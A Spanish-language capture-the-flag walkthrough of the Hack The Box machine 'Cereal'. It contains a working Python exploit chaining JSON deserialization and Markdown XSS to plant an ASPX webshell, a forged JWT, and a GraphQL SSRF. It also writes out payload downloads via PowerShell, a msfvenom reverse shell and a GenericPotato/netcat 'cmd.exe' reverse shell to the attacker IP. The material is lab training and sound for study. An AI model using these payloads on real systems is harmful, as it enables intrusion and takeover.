# Cereal

**OS**: Windows \
**Dificultad**: Difícil \
**Puntos**: 40

## Resumen
- Fuzzing directories
- Git Dumper
- Git logs / branch
- Json Web Token (JWT)
- Bypass Whitelist IP
- Serializing / XSS Markdown
- Port Forwarding
- Graphql
- NTLM Relay HTTP / SeImpersonatePrivilege
- GenericPotato

## Nmap Scan

`nmap -v -sV -sC -p- -oN cereal.txt 10.10.10.217`

```
Nmap scan report for 10.10.10.217
Host is up (0.065s latency).
Not shown: 65532 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 08:8e:fe:04:8c:ad:6f:df:88:c7:f3:9a:c5:da:6d:ac (RSA)
|   256 fb:f5:7b:a1:68:07:c0:7b:73:d2:ad:33:df:0a:fc:ac (ECDSA)
|_  256 cc:0e:70:ec:33:42:59:78:31:c0:4e:c2:a5:c9:0e:1e (ED25519)
80/tcp  open  http     Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://10.10.10.217/
443/tcp open  ssl/http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 1A506D92387A36A4A778DF0D60892843
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Cereal
| ssl-cert: Subject: commonName=cereal.htb
| Subject Alternative Name: DNS:cereal.htb, DNS:source.cereal.htb
| Issuer: commonName=cereal.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-11-11T19:57:18
| Not valid after:  2040-11-11T20:07:19
| MD5:   8785 41e5 4962 7041 af57 94e3 4564 090d
|_SHA-1: 5841 b3f2 29f0 2ada 2c62 e1da 969d b966 57ad 5367
|_ssl-date: 2020-12-24T17:42:11+00:00; +7m59s from scanner time.
| tls-alpn: 
|_  http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeración

Nmap nos muestra un par de dominios, los agregamos a nuestro archivo **hosts**.

##### /etc/hosts
```
10.10.10.217    cereal.htb source.cereal.htb
```

En https://cereal.htb/ podemos ver un formulario de inicio de sesión.

![1](img/1.png)

Mientras que en https://source.cereal.htb/ nos muestran un error y algo importante es la ruta donde se encuentran los archivos de la página **c:\inetpub\source\default.aspx**.

![2](img/2.png)

Utilizando **gobuster** buscamos directorios en las aplicaciones web.

`gobuster dir -u https://source.cereal.htb/ -w /usr/share/wordlists/dirb/common.txt -k`

![3](img/3.png)

En el subdominio **source.cereal.htb** encontramos el directorio **.git** y **uploads**. Con [git-dumper](https://github.com/arthaud/git-dumper) podemos obtener el repositorio.

- `mkdir git`
- `python3 /opt/git-dumper/git-dumper.py https://source.cereal.htb/ git/`

![4](img/4.png)

Revisando los logs del proyecto encontramos uno interesante que dice **CEREAL!!**.

`git log`

![5](img/5.png)

Utilizando la opción **checkout** nos podemos intercambiar de rama al commit que muestra el log.

`git checkout 8f2a1a88f15b9109e1f63e4e4551727bfb38eee5`

![6](img/6.png)

### Json Web Token (JWT)

Revisando el proyecto en el archivo **UserService.cs** encontramos la key con la que se generan los tokens al momento del inicio de sesión. También identificamos que el token debe contener el parámetro **name** y **Expires** que normalmente es **exp**.

![7](img/7.png)

Con la información anterior podemos crear nuestro propio token para acceder a la aplicación web. El parámetro **exp** necesita estar en formato **timestamp** por lo cual utilizamos el siguiente comando para crearlo:

`date -u +%s -d "12/31/2020"`

La siguiente página [jwt.io](https://jwt.io/) nos ayudará a crear el token.

![8](img/8.png)

En el archivo **auth-header.js** nos dice los headers que son necesarios para acceder.

![9](img/9.png)

Nos movemos al navegador y en la parte de **Storage/Local Storage** agregamos lo siguiente:

```
Key = currentUser 
Value = {"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJleHAiOjE2MDkzNzI4MDB9.fk30oimzWmg1hb8-G_B4zFj5LFezY9vD4EQYYtARDhw"}
```

De esa forma podremos acceder a la página web.

![10](img/10.png)

### Bypass Whitelist IP

En el archivo **request.service.js** se encuentran los métodos que podemos usar con el endpoint **/requests**.

![11](img/11.png)

Es posible hacer consultas con el método POST pero no a través del método GET. 

![12](img/12.png)

![13](img/13.png)

Ya que la aplicación tiene una whitelist que solo permite hacer uso del método GET a través de la IP 127.0.0.1 que se puede ver en el archivo **appsettings.json**.

![14](img/14.png)

### Serializing / XSS Markdown

Después de probar varias cosas nos damos cuenta de que es posible utilizar la función **DownloadHelper** para subir una webshell en la aplicación **source.cereal.htb** a través de un [XSS con formato Markdown](https://medium.com/taptuit/exploiting-xss-via-markdown-72a61e774bf8), esto nos permitirá hacer bypass del método GET y hacer consulta a nuestra primera petición que contiene el serializado.

Creamos un script para automatizar todo el ataque.

##### exploit.py
```python
import requests
import base64

url = 'https://cereal.htb/requests'

proxies = {
    "http":"http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

headers = {
    'Authorization':'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJleHAiOjE2MDkzNzI4MDB9.fk30oimzWmg1hb8-G_B4zFj5LFezY9vD4EQYYtARDhw',
    'X-Real-IP':'127.0.0.1'
}

### Paso 1. Crear contenido serializado
serialize = {
    "json":"{\"$type\": \"Cereal.DownloadHelper, Cereal\", \"URL\": \"http://10.10.15.109/cmdasp.aspx\", \"FilePath\": \"c:/inetpub/source/uploads/cmdasp.aspx\"}"
}

### Paso 2. Generar POST request con nuestro payload serilaizado y obtener el id
response = requests.post(url, headers=headers, proxies=proxies, json=serialize, verify=False)
response_json = response.json()
id_response = response_json['id']

### Paso 3. Crear XSS que hara el bypass de la ip para consultar el id anterior
payload = "var request = new XMLHttpRequest();\n"
payload += "request.open('GET','" + url + "/" + str(id_response) + "',true);\n"
payload += "request.setRequestHeader('Authorization','" + headers['Authorization'] + "');\n"
payload += "request.setRequestHeader('X-Real-IP','" + headers['X-Real-IP'] + "');\n"
payload += "request.send();"

### Paso 4. Encodear nuestro XSS en base64
payload_base64 = payload.encode('utf-8')
payload_base64 = base64.b64encode(payload_base64)
payload_base64 = payload_base64.decode('utf-8')

### Paso 5. Crear contenido con nuestro XSS en base64
xss = {
    "json":"{\"title\":\"[XSS](javascript: eval.call`${atob`" + payload_base64 + "`}`)\",\"flavor\":\"bacon\",\"color\":\"#FFF\",\"description\":\"test\"}"
} 

### Paso 6. Generar peticion con nuestro XSS
response_xss = requests.post(url, headers=headers, proxies=proxies, json=xss, verify=False)

print(response.json())
print(response_xss.json())
```

Creamos nuestra webshell y levantamos un servidor web.

- `cp /usr/share/webshells/aspx/cmdasp.aspx .`
- `python3 -m http.server 80`

Ejecutamos el exploit y con BurpSuite veremos el proceso.

`python3 exploit.py`

Primera petición POST.

![15](img/15.png)

Segundo petición POST.

![16](img/16.png)

Veremos que en nuestro servidor web obtenemos respuesta con un delay de 1 minuto aproximadamente.

![17](img/17.png)

Ahora podemos consultar nuestra webshell https://source.cereal.htb/uploads/cmdasp.aspx.

`type c:\users\sonny\desktop\user.txt`

![18](img/18.png)

## Escalada de Privilegios

Crearemos una shell con metasploit para tener mayor comodidad.

- `use exploit/multi/handler`
- `set payload windows/x64/meterpreter/reverse_tcp`
- `set lhost 10.10.15.109`
- `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.15.109 LPORT=4444 -f exe -o shell.exe`

![19](img/19.png)

Ejecutamos los siguientes comandos en la webshell.

- `powershell IWR http://10.10.15.109/shell.exe -Outfile c:\users\sonny\desktop\shell.exe`
- `c:\users\sonny\desktop\shell.exe`

![20](img/20.png)

### Port Forwarding

Podemos ver que tenemos asignado el privilegio **SeImpersonatePrivilege** esto nos permite Impersonar a usuarios del sistema.

`whoami /priv`

![21](img/21.png)

También encontramos el puerto **8080** abierto localmente.

`netstat -ano`

![22](img/22.png)

Haremos un port forward para acceder al puerto desde nuestra máquina.

`portfwd add -l 8080 -p 8080 -r 127.0.0.1`

![23](img/23.png)

### Graphql

> GraphQL engloba dos elementos principalmente, por un lado un lenguaje de consulta que le permite a los clientes que consumen un servicio web, especificar qué datos necesitan. Por otro lado, es un entorno de ejecución para responder a estas consultas a través de la especificación de un esquema tipado en el que se enlistan los datos que el servicio web puede entregar y las operaciones para dar respuesta a las solicitudes de los clientes.

Accediendo al puerto desde el navegador, en el código fuente se visualiza un endpoint **/api/graphql**.

![24](img/24.png)

Utilizando la herramienta [GraphQLmap](https://github.com/swisskyrepo/GraphQLmap) podemos enumerar la instancia de **Graphql**.

`python3 /opt/GraphQLmap/graphqlmap.py -u http://127.0.0.1:8080/api/graphql --method POST --json`

![25](img/25.png)

Algo interesante, es la consulta a **updatePlant**, ya que cuenta con un valor llamado **sourceURL**. Modificando este valor por la IP de nuestro servidor web podemos recibir la petición.

```
curl http://127.0.0.1:8080/api/graphql -X POST -H "Content-Type: application/json" -d "{ query:'mutation {updatePlant(plantId: 1, version: 1.0, sourceURL: \"http://10.10.15.109/doom\")}'}"
```

![26](img/26.png)

### NTLM Relay HTTP / SeImpersonatePrivilege

> NTLM Relay es una técnica de interponerse entre un cliente y un servidor para realizar acciones en el servidor mientras se hace pasar por el cliente.

> Cuando se le asigna el privilegio "Impersonate a client after authentication" a un usuario, permite que los programas que se ejecutan en nombre de ese usuario suplanten a un cliente. Esta configuración de seguridad ayuda a evitar que los servidores no autorizados se hagan pasar por clientes que se conectan a él a través de métodos como llamadas a procedimientos remotos (RPC) o canalizaciones con nombre (pipes).

Investigando de como tomar ventaja de lo anterior mencionado llegamos al siguiente [blog](https://en.hackndo.com/ntlm-relay/) donde nos explica el NTLM Relay a través  de HTTP. Combinando la vulnerabilidad de SeImpersonatePrivilige que se puede explotar con **SweetPotato** es posible escalar privilegios.

Utilizaremos [GenericPotato](https://github.com/micahvandeusen/GenericPotato) que ya se encuentra correctamente configurado para el ataque NTLM Relay HTTP, solo necesitaríamos compilar el código con Visual Studio. Dejaré el [programa](exploit/GenericPotato.exe) previamente compilado.

Subiremos el exploit y también nc.exe para obtener una reverse shell.

- `upload GenericPotato.exe`
- `upload nc.exe`
- `shell`

![27](img/27.png)

Ejecutamos el siguiente comando para poner a la escucha nuestro servidor.

`GenericPotato.exe -p c:\users\sonny\desktop\nc.exe -a "-e cmd.exe 10.10.15.109 4545" -l 8081`

![28](img/28.png)

Ponemos a la escucha nuestro netcat.

`rlwrap nc -lvnp 4545`

Ejecutamos el siguiente comando:

```
curl http://127.0.0.1:8080/api/graphql -X POST -H "Content-Type: application/json" -d "{ query:'mutation {updatePlant(plantId: 1, version: 1.0, sourceURL: \"http://127.0.0.1:8081/doom\")}'}"
```

![29](img/29.png)

Obtenemos nuestra reverse shell como **NT AUTHORITY/SYSTEM**.

![30](img/30.png)

## Referencias
https://github.com/arthaud/git-dumper \
https://jwt.io/ \
https://medium.com/taptuit/exploiting-xss-via-markdown-72a61e774bf8 \
https://github.com/JakobTheDev/information-security/blob/master/Payloads/md/XSS.md \
https://github.com/swisskyrepo/GraphQLmap \
https://en.hackndo.com/ntlm-relay/ \
https://github.com/micahvandeusen/GenericPotato